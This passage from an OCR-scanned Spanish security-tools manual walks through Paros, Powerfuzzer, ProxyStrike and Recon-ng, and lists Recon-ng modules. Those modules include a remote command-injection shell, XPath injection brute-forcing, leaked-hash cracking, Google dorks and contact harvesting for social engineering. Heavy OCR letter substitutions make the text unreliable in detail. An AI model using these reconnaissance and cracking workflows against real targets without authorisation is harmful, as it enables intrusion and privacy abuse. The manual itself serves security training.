se registra. 

• Convierte datos en diferentes formatos de codificación/hash, incluidos Base64, SHAl y 
MD5 (Menú => Tools => Hash/Encoding) 

47.5. Ejemplo 

Eos siguientes pasos para probar una vulnerabilidad y obtener su informe son: 

1. Establecer el local proxy en paros 

2. Establecer el mismo proxy en el navegador a utilizar 

3. Ahora navegar por ejemplo a http://192.168.0.30/mutillidae y observar que aparece en la 
pestaña Sites de Paros. 

4. Hacer clic con el botón derecho en http://192.168.0.30/mutillidae y elegir Spider para 
rastrear a través de todo el sitio web. Esto tomará algunos minutos, dependiendo de que tan 
grande es el sitio web. 

5. 3. Una vez que haya finalizado el rastreo del sitio web, se podrán ver todas las páginas 
descubiertas, en la pestaña Spider en la parte inferior. Además se puede perseguir la solicitud 
en particular y la respuesta para una página deseada seleccionando el sitio web objetivo y 
elegir una página específica en el panel izquierdo de la pestaña Sites. 

6. Para interceptar cualquier otra solicitud o respuesta, ir a la pestaña Trap en el panel derecho. 
Esto es particularmente útil cuando se decide lanzar algunas pruebas manuales contra la 
aplicación de destino. Además también se puede construir su propia solicitud HTTP 
navegando a Tools | Manual Request Editor. 

7. Para ejecutar las pruebas de vulnerabilidad automatizadas, seleccionar el sitio web de 
destino bajo la pestaña Sites y navegar a AnalyzejScan All del menú. Notar que aún se puede 
seleccionar los tipos específicos de pruebas de seguridad al navegar a Analyzej Sean Policy y 
luego navegar a AnalyzejScan en lugar de seleccionar Sean All. 

8. Una vez completadas las pruebas de vulnerabilidad, se puede ver una serie de alertas en la 
pestaña Alerts en la parte inferior. Estas se categorizan como de niveles de riesgo de tipo 
alto, bajo y medio. 

9. Si se desea el informe de escaneo, ir a ReportjEast Sean Report en la barra de menú. Esto 
generará un informe que enumera todos las vulnerabilidades encontradas durante la sesión 
de prueba (/root/paros/sessio /EatestScannedReport.html). 



48. Powerfuzzer 


Powerfuzzer es un fuzzer web altamente automatizado y totalmente personalizable basado en 
muehos otros fuzzers de eódigo abierto disponibles e información recopilada de numerosos recursos 
de seguridad y sitios web. Fue diseñado para ser fácil de usar, moderno, efectivo y funcional. 

Actualmente, es capaz de identificar estos problemas: 

• Cross Site Scripting (XSS) 

• Inyecciones (SQL, LDAP, código, comandos y XPATH) 

• CRLF 

• Estados HTTP 500, generalmente indicativos de un posible error de configuración / 
seguridad, incluido desbordamiento del búfer 

Cuando se ejecuta powerfuzzer, se muestra la pantalla siguiente 


En esta ventana, el campo principal es Target URL donde se debe escribir la URL a analizar. 
También hay los campos siguientes opcionales: 

- Credentials. Aquí se puede entrar el nombre de usuario y contraseña a usar. 

- Cookie. Eichero donde está las cookies a usar. 

- Proxy. Dirección o URL del proxy a usar. 

- Exelude URL(s) or dir: URLs o directorios a no ser analizados 

- Verbosity. Detalle de los mensajes durante el escaneo. 

- Timeout. Tiempo entre mensajes de escaneo. 


Y como es obvio los botones Sean y Stop de inicio y paro del escaneo 



49. ProxyStrike 


ProxyStrike es un proxy de aplicación web activo. Es una herramienta diseñada para encontrar 
vulnerabilidades mientras se navega por una aplicación. Fue creado debido a los problemas que se 
enfrentan en los intentos de aplicaciones web que dependen en gran medida de JavaScript. 

En este momento tiene disponible los plugins de inyección SQE y XSS. Ambos plugins están 
diseñados para detectar tantas vulnerabilidades como se puedan, es por eso que el complemento de 
Inyección de SQL es un puerto Python. 

El proceso es muy simple, ProxyStrike se ejecuta como un proxy que escucha en el puerto 8080 de 
manera predeterminada, por lo que tiene que navegar por el sitio web deseado configurando su 
navegador para usar ProxyStrike como un proxy y ProxyStrike analizará todos los parámetros en 
modo de fondo. Para el usuario es un proxy pasivo porque no verá ningún comportamiento diferente 
de la aplicación, pero en segundo plano es muy activo. 

Algunas caracteristicas: 

• Motor de plugin. Permite crear tus propios plugins 

• Solicitud de interceptor 

• Solicitud de diferencia 

• Solicitud de repetidor 

• Proceso de rastreo automático 

• Historial de solicitud / respuesta HTTP 

• Solicitar estadisticas de parámetros 

• Solicitar estadisticas de valores de parámetros 

• Solicitar la firma del parámetro url y la firma del campo del encabezado 

• Uso de un proxy alternativo 

• Ataques SQL 

• Server Side Ineludes (plugin) 

• Ataques Xss (plugin) 

• Registros de ataque 

• Exportar resultados a HTML o XML 




Cuando se ejecuta este programa se visualiza la ventana siguiente 


A continuación se debe configurar el navegador web, en esta caso Firefox, para que utilice a 
ProxyStrike como proxy 


Cuando se visitan webs con el navegador, el ProxyStrike empieza a procesar toda la información 
que pasa por él y la visualiza en su ventana. 

La ventana principal consta de las pestañas siguientes: 

• Comms. Visualiza la lista de GETs y POSTs encontrados y cuando se selecciona cada uno de 
ellos se visualiza su contenido en la parte inferior de la pantalla. En esta pestañas las 
posibles acciones a realizar son: Repeat, Intercept, Edit request in view, Delete request in 
view, Delete selected request. 

• Request Stats 

• Variable Stats 

• Config. En esta pestaña, se puede entrar los valores de aquellas variables a alterar de un 
GET o POSE interceptado, asi como su cabecera.También al establecimiento de un proxy. 

• Plugins. Son de 2 tipos: Sql attacks y XSS & SSI attacks 

• Eog. En esta pestaña se visualizan todos los mensajes generados 

• Repeat Request 

• Crawler 


Para ejecutar un procedimiento de crawling, ingresar a la pestaña “Crawler”, escribir la URL del 
objetivo en el campo precedido por “Urk”, para luego hacer clic en el botón “Stopped”. Los 
resultados de los formularios encontrados se mostrarán en el lado derecho. 


Si se navega por la aplicación web objetivo y se detecta que una de sus páginas que la constituyen, 
permite enviar comentarios. En la siguiente imagen se visualiza el envió utilizando el método 
POST 

Al ingresar en la pestaña “Plugins” se seleccionan los plugins relacionados a Ataques XSS (Cross 
Site Scripting) y SSI (Server Side Ineludes) 


Tal como lo indica la herramienta, existen inyecciones disponibles en las diferentes variables que 
componen el formulario “Comms” de la aplicación web. 

Para realizar una prueba de XSS se utilizará el Repetidor de Peticiones (Repeat Request). En 
primera instancia se hace clic en la pestaña “Comms” para seleccionar la petición que se repetirá y 
luego se deber hacer clic en el botón “Repeat”. 

Esta acción automáticamente dirigirá a la pestaña “Repeat Request”, donde es factible realizar 
cualquier modificación sobre la petición que se enviará. Euego de realizadas las modificaciones, 
hacer clic en el botón “Perfom”. 



La Respuesta se presentará en la parte inferior de la misma ventana, donde se puede observar 
ineluida en la fuente HTML de la página web devuelta por la aplieaeión web, el tipleo eódigo 
Javaseript que se realiza par 
a evaluar un XSS. 



50. Recon-ng 


Recon-ng es un marco de reconocimiento de un dominio que nos da información exhaustiva de este 
dominio usando los distintos módulos que lleva incorporado. Está escrito en Python. Recon-ng 
proporciona un poderoso entorno en el cual se puede realizar un reconocimiento basado en una web 
de manera rápida y total. 

Cuando se inicia en modo interactivo, se debe ejecuta 
>recon-ng 

y a continuación se visualiza la cantidad de módulos que contiene de cada clase, por ejemplo, 

[77] Recon modules 
[8] Reporting modules 
[2] Import modules 
[2] Exploitation modules 
[2] Discovery modules 

y ya se puede entrar ejecutando cuaquiera de los comandos siguientes: 


add 

Añadir registros a la base de datos 

back 

Ir hacia atrás 

delete 

Borrar registros a la base de datos 

exit 

Salir del programa 

help 

Mostrar la ayuda 

keys 

Administrar las credenciales de recursos de terceros. 

load 

Cargar un módulo 

pdb 

Iniciar una sesión de Python Debugger 

query 

Petición a la base de datos 

record 

Registrar comandos en un archivo de recursos 

reload 

Recargar todos los módulos 

resource 

Ejecutar los comandos de un recurso 

search 

Buscar módulos disponibles 

set 

Establecer el valor de una opción de un módulo 

shell 

Ejecutar comandos de shell 

show 

Mostrar los Ítems del programa 

snapshots 

Posibilidad de hacer copias de seguridad y restaurar instantáneas de 
la base de datos. 

spool 

Sacar la información a un fichero 

unset 

Dejar en blanco los valores de las opciones de un módulo 

use 

Ejecutar los módulos cargados 

workspaces 

Gestiona los espacios de trabajo 




Con el comando show modules, lista todos los módulos disponibles. 
También hay la posibilidad de ejecutar recon-ng en línea de comandos como 
recon-ng [-h] [-v] [-w workspace] [-r fdename] [—no-check] [—no-analytics] 
donde los argumentos opcionales son 


-h, —help 

Mostrar la ayuda y salir 

-V, —versión 

Mostrar el número de versión del programa y salir 

-w workspace 

cargar / crear un espacio de trabajo 

-r filename 

cargar comandos desde un archivo de recursos 

—no-check 

desactivar la verificación de versión 

—no-analytics 

deshabilitar informes analíticos 


Este programa consta básicamente de los elementos siguientes: 

- Espacio de trabajo. 

- Módulos 

- Dominios 

Eos espacios de trabajo o workspaces ayudan a los usuarios a realizar múltiples compromisos 
simultáneos sin tener que configurar repetidamente las opciones globales o las bases de datos. Toda 
la información de cada área de trabajo se almacena en su propio directorio debajo de la carpeta 
"~/.recon-ng/workspaces/". Cada espacio de trabajo consta de su propia instancia de la base de 
datos de recon-ng, un archivo de configuración para el almacenamiento de las opciones de 
configuración, informes de los módulos de informes y cualquier botín que se recopile de otros 
módulos. Para ver una lista de espacios de trabajo disponibles, usar el comando "workspaces bst" o 
el alias "show workspaces". Para dar de alta un espacio de trabajo se debe usar el comando 
‘workspaces add’. Para eliminar un área de trabajo, usar el comando "workspaces delete", áreas de 
trabajo eliminar <name>. 

El otro elemento fundamental son los dominios de los que se quiere obtener información mediante 
el uso de los módulos. Para añadir un dominio, usar el comando ‘add domains’ y para borrarlo el 
comando ‘delete domains’ y el número de la fila del dominio en la tabla. 

Para ver el contenjdo de la base de datos se empleará el cornado show seguidos del nombre de los 
diferentes elementos de la misma y son los siguientes: companies, contacts, credentials, dashboards, 
domains, globals, hosts, info, inputs, keys, leaks, locations, modules, netblocks, options, ports, 
profiles, pushpins, repositories, schema, source, vulnerabilities. 

Ejemplo 

Una vez establecido un espacio de trabajo y añadido los dominios a analizar, se debe expbcitar el 
nombre del módulo a usar empleando el comando use <nombre del módulo> 

Después de cargar un módulo, el contexto del marco cambia y hay un nuevo conjunto de comandos 
y opciones disponibles. Estos comandos y opciones son exclusivos del módulo y para verlo emplear 
el comando show info para ver toda la información del módulo y el comando show options que 
muestra los parámetros del módulo. El comando "show source" mostrará su código fuente. 


Para ejecutar el módulo, emplear el comando run y a partir de aquí se deben emplear los comandos 
propios de la base de datos donde se ha almacenado los resultados de la ejecución del módulo. 




Módulos de descubrimiento 


1. DNS Cache Snooper 

Ruta: modules/discovery/info_disclosure/cache_snoop.py 

Descripción: Utiliza la técnica de indagación de caché DNS para verificar los dominios visitados 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

DOMAINS 

/usr/share/recon- 
ng/data/av domains.lst 

Si 

Archivo que contiene la lista de 
dominios a espiar 

NAMESERVER 


Si 

Dirección IP del servidor de nombres 
autorizado 


Comentarios: 

* El nombre del servidor debe ser una dirección IP 

* http ://304geeks .blogspot. com/2013/01/ dns-scraping-for-corporate-av-detection.html 


2. Interesting File Finder 

Ruta: modules/discovery/info_disclosure/interesting_fdes.py 

Descripción: Comprueba los hosts en busca de archivos interesantes en ubicaciones predecibles. 
Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

DOWNEOAD 

Truc 

Si 

Descargar archivos descubiertos 

PORT 

80 

Si 

Puerto requerido 

PROTOCOL 

http 

Si 

Protocolo requerido 

SOURCE 

default 

Si 

Fuente de entrada 


Opciones del origen: 

default SEFECT DISTINCT host FROM hosts WHERE host IS NOT NUFF 
<string> string representing a single input 
<path> path to a file containing a list of inputs 
query <sql> database query retuming one column of inputs 
Comentarios: 

* Files: robots.txt, sitemap.xml, sitemap.xml.gz, crossdomain.xml, phpinfo.php, test.php,elmah.axd, 
server-status, jmx-console/, admin-console/, web-console/ 

* Google Dorks: 

- inurkrobots.txt ext:txt 

- inurkelmah.axd ext:axd intitle:"Error log for" 

- inurl: server-status "Apache Status" 

Módulos de explotación 

3. Remóte Command Injection Shell Interface 

Ruta: modules/exploitation/injection/command injector.py 

Descripción: Proporciona una interfaz de shell para fallos de inyección de comandos remotos en 
aplicaciones web. 

Opciones: 


Nombre 

Valor 

actual 

Requerí 

do 

Descripción 

BASEURL 


Si 

URL del recurso de destino excluyendo cualquier 
parámetro 

BASICPASS 


No 

Contraseña para la autenticación básica 






BASICUSER 


No 

Nombre de usuario para la autenticación básica 

COOKIE 


No 

Cadena de cookies que contiene datos de sesión 
autenticados 

MARKEND 


No 

Cadena para que coincida con el contenido de la 
página siguiendo la salida del comando 

MARKSTART 


No 

Cadena para que coincida con el contenido de la 
página que precede al resultado del comando 

PARAMETERS 


Si 

Los parámetros de consulta con '<rce>' que 
significan el valor del parámetro vulnerable 

POSE 

False 

Si 

Establecer el método de solicitud a POSE. Los 
parámetros aún deben enviarse en la opción url 


4. Xpath Injection Brute Forcer 

Ruta: modules/exploitation/injection/xpath_bruter.py 

Descripción: Aprovecha los defectos de inyección de XPath para enumerar el contenido de los 
documentos XML del lado del servidor. 

Opciones: 


Nombre 

Valor 

aetual 

Requerido 

Deseripeión 

BASEURL 


Si 

URL del recurso de destino excluyendo cualquier 
parámetro 

BASICPASS 


No 

Contraseña para la autenticación básica 

BASICUSER 


No 

Nombre de usuario para la autenticación básica 

COOKIE 


No 

Cadena de cookies que contiene datos de sesión 
autenticados 

PARAMEEERS 


Si 

Los parámetros de consulta con '<inject>' que 
significa la inyección 

POSE 

False 

Si 

Establecer el método de solicitud a POSE. Los 
parámetros aún deben enviarse en la opción url 

SERING 


Si 

Cadena única encontrada cuando la inyección da 
como resultado 'tme' 


Módulos de importación 

5. Advanced CSV File Importer 
Ruta: modules/import/csv_fde.py 

Descripción: Importa valores de un archivo CSV a una tabla de base de datos. 
Opciones: 


Nombre 

Valor 

actual 

Requerido 

Descripción 

COLUMNSEPARAEOR 

j 

Si 

Carácter que separa cada valor de columna 

EILENAME 


Si 

Ruta y nombre de archivo para entrada csv 

HASHEADER 

Erue 

Si 

Si la primera fila del archivo csv debe 
interpretarse o no como nombres de columna 

QUOEECHARACEER 


No 

Carácter que rodea cada valor de columna 

EABLE 


Si 

Eabla para importar los valores csv 


Comentarios: 

* Solo hay algunas opciones disponibles hasta que se establezca un nombre de archivo válido. 






Luego, el arehivo se analiza y más opeiones están disponibles para eonfigurar donde se importa 
cada entrada CSV. 

* Este módulo es muy poderoso y puede contaminar seriamente una base de datos. Se recomienda 
hacer una copia de seguridad de la base de datos antes de importar. 

6. List File Importar 
Ruta: modules/import/list.py 

Descripción: Importa valores de un archivo de lista a una tabla y columna de base de datos. 
Opciones: 


Nombre 

Valor 

actual 

Requerido 

Descripción 

COLUMN 


Si 

Columna para importar los valores de la lista 

FILENAME 


Si 

Ruta y nombre de archivo para entrada de lista 

TABEE 


Si 

Tabla para importar los valores de lista 


Módulos de reconocimiento 

7. Bing Cache Linkedin Profile and Contact Harvester 

Ruta: modules/recon/companies-contacts/bing linkedin cache.py 

Keys: bing api 

Descripción: Recoge los perfiles de Linkedin al consultar el caché de la API de Bing para las 
páginas de Linkedin relacionadas con las empresas establecidas y los agrega a la tabla de ’profdes'. 
Luego el módulo analizará la información resultante para extraer el nombre completo del usuario y 
el título del trabajo. El nombre completo y el título del usuario se agregan a la tabla de "contacts". 
Este módulo no accede a Linkedin en ningún momento. 

Opciones: 


Nombre 

Valor 

actual 

Requerido 

Descripción 

LIMIT 

0 

Si 

Limitar el número total de páginas por solicitud 
de API (0 = ilimitado) 

SOURCE 

default 

Si 

Fuente de entrada 

SUBDOMAINS 


No 

Subdominio(s) para buscar en Linkedin: www, 
ca, uk, etc. 


Opciones del origen: 

default SELECT DISTINCT company FROM companies WHERE company IS NOT NULL 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Asegúrese de establecer la opción ’SUBDOMAINS' en la región en la que se encuentra su 
objetivo. 

* Obtendrá mejores resultados si utiliza más subdominios además de ’www'. 

* Se pueden proporcionar varios subdominios en una lista separada por comas. 

* Los resultados incluirán asociaciones históricas, no solo empleados actuales. 

8. Jigsaw - Point Usage Statistics Fetcher 

Ruta: modules/recon/companies-contacts/jigsaw/pomt_usage.py 

Keys: jigsaw_username, jigsaw_password, jigsaw_api 

Descripción: Consulta la API de Jigsaw para las estadísticas de uso de puntos de la cuenta dada. 
Opciones: No hay. 





9. Jigsaw - Single Contact Retriever 

Ruta: modules/recon/companies-contacts/jigsaw/purchase_contact.py 
Keys: jigsaw_username, jigsaw_password, jigsaw_api 

Descripción: Recupera un solo contacto completo de la API de Jigsaw.com usando puntos de la 
cuenta dada. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

CONTACT 


Si 

Identificación del contacto Jigsaw 


Comentarios: 

* Account Point Cost: 5 puntos por solicitud. 

* Este módulo se usa generalmente para validar las convenciones de nomenclatura de direcciones 
de correo electrónico y recopilar información alternativa de ingenieria social. 

10. Jigsaw Contact Enumerator 

Ruta: modules/recon/companies-contacts/jigsaw/search_contacts.py 
Keys: jigsaw_api 

Descripción: Recopila los contactos de la API de Jigsaw.com. Actualiza la tabla de 'contacts' con los 
resultados. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

KEYWORDS 


No 

palabras clave adicionales para identificar la 
empresa 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT company EROM companies WHERE company IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

11, lANA Prívate Enterprise Number Contact Getter 
Ruta: modules/recon/companies-contacts/pen.py 

Descripción: Dado el nombre de una empresa, recopila el contacto del número de empresa privada 
(PEN) de lANA registrado en el registro de PEN. El nombre completo y la dirección de correo 
electrónico de los contactos se agregan a la tabla de "contacts". 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT company EROM companies WHERE company IS NOT NULE 

<string> cadena que representa una sola entrada 

<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

12. lANA Prívate Enterprise Number Domain Getter 
Ruta: modules/recon/companies-domains/pen.py 

Descripción: Dado el nombre de una empresa, recopila un dominio de la dirección de correo 
electrónico del contacto del Número de Empresa Privada (PEN) registrado de lANA del registro 
PEN. El dominio se agrega a la tabla 'domains'. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 







SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT eompany EROM companies WHERE eompany IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que eontiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una columna de entradas 

13. Github Resouree Miner 

Ruta: modules/reeon/eompanies-multi/github miner.py 
Keys: github api 

Deseripeión: Utiliza la API de Github para enumerar repositorios y perfiles de miembros asoeiados 
eon una eadena de búsqueda de la empresa. Aetualiza las tablas respeetivas eon los resultados. 
Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SEEECT DISTINCT eompany EROM eompanies WHERE eompany IS NOT NULE 

<string> eadena que representa una sola entrada 

<path> ruta a un arehivo que contiene una lista de entradas 

query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

14. Whois Data Miner 

Ruta: modules/reeon/eompanies-multi/whois_miner.py 

Deseripeión: Utiliza el ARIN Whois RWS para reeoleetar eompañias, ubieaeiones, bloques de red y 
eontaetos asoeiados eon la eadena de búsqueda de la eompañia dada. Aetualiza las tablas 
respectivas con los resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT eompany EROM eompanies WHERE eompany IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un archivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Las búsquedas eon wildeard se permiten usando el earáeter 

* Valida los resultados de la eadena SEARCH eon estas URLs: 

- http://whois.arin.net/rest/orgs;name=<SEARCH> 

- http://whois.arin.net/rest/eustomers;name=<SEARCH> 

15. MailTester Email Validator 

Ruta: modules/reeon/eontaets-eontacts/mailtester.py 

Deseripeión: Aproveeha MailTester.eom para validar las direeciones de eorreo eleetrónieo. 
Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

REMOVE 

False 

Si 

Eliminar direeeiones de eorreo eleetrónieo no 
válidas 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT email EROM eontacts WHERE email IS NOT NULE 
<string> eadena que representa una sola entrada 







<path> ruta a un archivo que contiene una lista de entradas 

query <sql> consulta de base de datos que devuelve una columna de entradas 

16. ContaetName Mangler 

Ruta: modules/reeon/eontacts-eontacts/mangle.py 

Deseripeión: Apliea un patrón de manipulación a todos los contactos almacenados en la base de 
datos, oreando direooiones de correo eleotrónioo o nombres de usuario para oada oontaoto 
ooseohado. Aotualiza la tabla de 'oontaots' oon los resultados. 

Opoiones: 


Nombre 

Valor aotual 

Requerido 

Deseripeión 

DOMAIN 


no 

Dominio de oorreo eleotrónioo de destino 

MAX-EENGTH 

30 

Si 

Eongitud máxima del prefijo de la direooión de 
correo eleotrónioo o nombre de usuario 

OVERWRITE 

False 

Si 

Sobresoribir las direooiones de correo electrónioo 
existentes 

PATTERN 

<fn>.<ln> 

Si 

patrón aplioado a destrozar nombre y apellido 

SOURCE 

default 

Si 

Origen de entrada 

SUBSTITUTE 

- 

Si 

oaráoter para sustituir oaraoteres de direooión de 
oorreo eleotrónioo no válidos 


Opoiones del origen: 

default SELECT rowid, first name, middle name, last name, email EROM oontacts ORDER 
BY first name 

<string> oadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> oonsulta de base de datos que devuelve una oolumna de entradas 
Comentarios: 

* Opoiones del patrón: <fi>,<fn>,<mi>,<mn>,<li>,<ln> 

* Ejemplo: <fi>.<ln> => j.doe@domain.oom 

* Nota: Omitir la opoión 'domain' para orear nombres de usuarios 

17. ContaetName Unmangler 

Ruta: modules/reoon/oontaots-oontaots/unmangle.py 

Deseripeión: Apliea un patrón regex o unmangle a todos los oontaotos almaoenados en la base de 
datos, saoando los oomponentes de nombres individuales. Aotualiza la tabla de 'oontaots' oon los 
resultados. 

Opoiones: 


Nombre 

Valor actual 

Requerido 

Deseripeión 

OVERWRITE 

False 

Si 

Si se estableoe en verdadero, se aotualizará la 
entrada de oontacto existente; de lo oontrario, 
se oreará una nueva entrada 

PATTERN 

<fn>.<ln> 

Si 

Patrón aplicado a email 

SOURCE 

default 

Si 

Origen de entrada 


Opoiones del origen: 

default SEEECT rowid, first name, middle name, last name, email EROM contaots WHERE 
email IS NOT NULL 

<string> oadena que representa una sola entrada 
<path> ruta a un arohivo que oontiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* El patrón puede ser una expresión regular o un patrón. 





* Los patrones disponibles son: - <fn>.<ln>, <fn>, <fi><ln>, <fn>-<ln>, <ln>, <fn>_<ln>, 
<ln><fi><mi>, <ln><fi> 

*Una expresión regular debe eapturar los valores utilizando estos grupos de eaptura eon nombre: 

- (?P<first_name>) (?P<middle_name>) (?P<last_name>) 

* Aqui se puede eneontrar una hoja de trueos y un solucionador de problemas de sintaxis regex: 

- http://pythex.org/ or http://www.pyregex.oom/ 

18. Have I been pwned? Breaoh Searoh 

Ruta: modules/reoon/oontacts-oredentials/hibp breach.py 

Desoripoión: Aprovecha la API haveibeenpwned.com para determinar si las direcciones de correo 
electrónico están asociadas con credenciales violadas. Agrega direcciones de correo electrónico 
comprometidas a la tabla de 'credentials'. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT email EROM contacts WHERE email IS NOT NULE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Ea API tiene una tasa limitada de 1 solicitud por cada 1,5 segundos. 

19. Have I been pwned? Paste Search 

Ruta: modules/recon/contacts-credentials/hibp_paste.py 

Descripción: Aprovecha la API haveibeenpwned.com para determinar si las direcciones de correo 
electrónico se han publicado en varios sitios de pegado. Agrega direcciones de correo electrónico 
comprometidas a la tabla de 'credentials'. 

Opciones: 

Nombre Valor actual Requerido Descripción 


DOWNEOAD Truc yes download pastes 

SOURCE default yes source of input (see 'show info' for details) 

Opciones del origen: 

default SEEECT DISTINCT email EROM contacts WHERE email IS NOT NULE 
<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Paste sites supported: Pastebin, Pastie, Slexy, Ghostbin, QuickEeak, JustPaste, AdHocUrl, and 
OptOut.The HIBP API is rate limited to I requestper 1.5 seconds. 

20. Contacts to Domains Data Migrator 

Ruta: modules/recon/contacts-domains/migrate contacts.py 

Descripción: Agrega un nuevo dominio para todos los nombres de dispositivo asociados con las 
direcciones de correo electrónico almacenadas en la tabla de "contacts". 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT email EROM contacts WHERE email IS NOT NULE 






<string> cadena que representa una sola entrada 
<path> ruta a un archivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* This modules eonsiders that everything after the first element eould eontain other hosts besides 
the eurrent. Therefore, hosts > 2 domains deep will ereate domains > 2 elements in length. 

21. FullContaet Contaet Enumerator 

Ruta: modules/reoon/eontacts-profdes/fulleontact.py 

Keys: fulleontaet api 

Deseripeión: Coseeha informaeión de eontaeto y perfiles de la API fulleontaet.eom utilizando las 
direeeiones de eorreo eleetrónieo eomo entrada. Aetualiza las tablas de ’eontaets' y 'profiles' eon los 
resultados. 

Opeiones: 


Nombre 

Valor aetual 

Requerido 

Deseripeión 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 

default SELECT DISTINCT email EROM eontacts WHERE email IS NOT NULE 
<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 

22. Adobe Hash Craeker 

Ruta: modules/reeon/eredentials-eredentials/adobe.py 

Deseripeión: Deseifra los hash filtrados de la violaeión de Adobe 2013. Primero, el módulo haee 
las refereneias cruzadas a la ID de fuga para identifiear los hashes de Adobe en la eolumna 
'password' de la tabla 'ereds', mueve los hashes de Adobe a la eolumna 'hash' y eambia el 'type' a 
'Adobe'. En segundo lugar, el módulo intenta deseifrar los hash eomparando los bloques de eifrado 
deeodifieados del texto eifrado eon una tabla de búsqueda de bloque loeal (BLOCK DB) de valores 
de bloque de cifrado conocidos. Einalmente el módulo aetualiza la tabla 'ereds' eon los resultados 
basados en el nivel de éxito. 

Opeiones: 


Nombre 

Valor aetual 

Requer 

ido 

Deseripeión 

BLOCKDB 

/usr/share/reeon- 

ng/data/ adobe_bloeks .j 

son 

Si 

Arehivo JSON que eontiene bloques de 
eifrado de Adobe eonoeidos y texto sin 
formato 

SOURCE 

default 

Si 

Origen de entrada 


Opeiones del origen: 


default SEEECT DISTINCT hash EROM eredentials WHERE hash IS NOT NULE AND 
password IS NULE AND type IS 'Adobe' 

<string> eadena que representa una sola entrada 
<path> ruta a un arehivo que eontiene una lista de entradas 
query <sql> eonsulta de base de datos que devuelve una eolumna de entradas 
Comentarios: 

* Tipos de hash compatibles: Adobe's base64 format 

* Base de datos de hash de: http://strieture-group.eom/fdes/adobe-toplOO.txt 

* Una eontraseña eompletamente rellenada indiea que se eonoee la longitud exaeta. 

23. PyBozoCraek Hash Lookup 

Ruta: modules/reoon/oredentials-eredentials/bozooraek.py 





Descripción: Busca en Google el valor de un hash y prueba una coincidencia mediante el hash de 
cada palabra en la página resultante utilizando todos los algoritmos de hash admitidos por la 
biblioteca ’hashlib'. Actualiza la tabla de 'credentials' con los resultados positivos. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SELECT DISTINCT hash EROM credentials WHERE hash IS NOT NUEE AND 
password IS NUEE AND type IS NOT Adobe' 

<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Inspirado por el script de PyBozoCrack: https://github.com/ikkebr/PyBozoCrack 

24. Hashes.org Hash Eookup 

Ruta: modules/recon/credentials-credentials/hashes_org.py 
Keys: hashes_api 

Descripción: Utiliza la API Hashes.org para realizar una búsqueda de hash inversa. Actualiza la 
tabla de 'credenials' con los resultados positivos. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

default SEEECT DISTINCT hash EROM credentials WHERE hash IS NOT NUEE AND 
password IS NUEE AND type IS NOT 'Adobe' 

<string> cadena que representa una sola entrada 
<path> ruta a un archivo que contiene una lista de entradas 
query <sql> consulta de base de datos que devuelve una columna de entradas 
Comentarios: 

* Eos tipos de hash soportados: MD5, MD4, NTLM, EM, D0UBEEMD5, TRIPEEMD5, 
MD5SHA1, SHAl, MYSQE5, SHA1MD5, 

DOUBEESHAl, RIPEMD160 

* hashes.org es un servicio gratuito. 

25. lANA Prívate Enterprise Number Company-by-Domain Eookup 
Ruta: modules/recon/domains-companies/pen.py 

Descripción: Dado un dominio, encuentra un contacto en el registro de Número de empresa privada 
(PEN) de la lANA cuya dirección de correo electrónico finaliza con ese dominio. El dominio se 
agrega a la tabla 'domains'. 

Opciones: 


Nombre 

Valor actual 

Requerido 

Descripción 

SOURCE 

default 

Si 

Origen de entrada 


Opciones del origen: 

